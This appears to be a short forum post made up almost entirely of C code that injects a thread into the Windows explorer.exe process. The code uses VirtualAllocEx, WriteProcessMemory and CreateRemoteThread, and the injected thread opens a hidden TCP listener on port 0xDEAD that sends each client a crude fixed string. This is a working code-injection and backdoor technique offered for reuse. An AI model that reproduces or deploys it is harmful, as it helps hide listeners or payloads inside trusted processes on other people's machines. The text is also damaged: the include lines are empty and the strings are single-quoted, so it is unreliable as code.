akcom
I'm not a big fan of commenting, so if you have any questions, just provide me with the line and i will explain it
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );
typedef struct _INJINFO
{
char c_Lib[16];
char c_WSAStartup[12];
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];
LPLoadLibrary LoadLib;
LPGetProcAddress GetProcAddr;
} INJINFO, *PINJINFO;
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;
HMODULE hLib = info->LoadLib( info->c_Lib );
LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;
WSADATA wsa;
wsastartup( 0x0202, &wsa );
SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );
wsalisten( ServerSocket, 5 );
SOCKET cli;
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}
wsaclosesocket( ServerSocket );
return 0;
}
static void __declspec( naked ) end_proc()
{
}
INJINFO info =
{
'ws2_32.dll',
'WSAStartup',
'socket',
'bind',
'listen',
'accept',
'closesocket',
'send',
'slutted',
NULL,
NULL
};
int main(int argc, char* argv[])
{
HMODULE hLib = LoadLibrary( 'kernel32.dll' );
info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, 'LoadLibraryA' );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, 'GetProcAddress' );
DWORD dwPID;
GetWindowThreadProcessId( FindWindow( 'Shell_TrayWnd', NULL ), &dwPID );
printf( 'explorer pid: 0x%x\n', dwPID );
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( 'error opening process\n' );
return 0;
}
DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( 'proc size: %u\n', ProcSize );
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );
if ( !lpProc || !lpParams )
{
printf( 'error allocating mem\n' );
return 0;
}
printf( 'memory allocated at 0x%X and 0x%X\n', lpProc, lpParams );
DWORD dwWritten;
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );
printf( 'memory written\n' );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
if ( hThread == NULL )
{
printf( 'error creating thread\n' );
}
else
{
WaitForSingleObject( hThread, INFINITE );
}
VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );
printf( 'done\n' );
return 0;
}
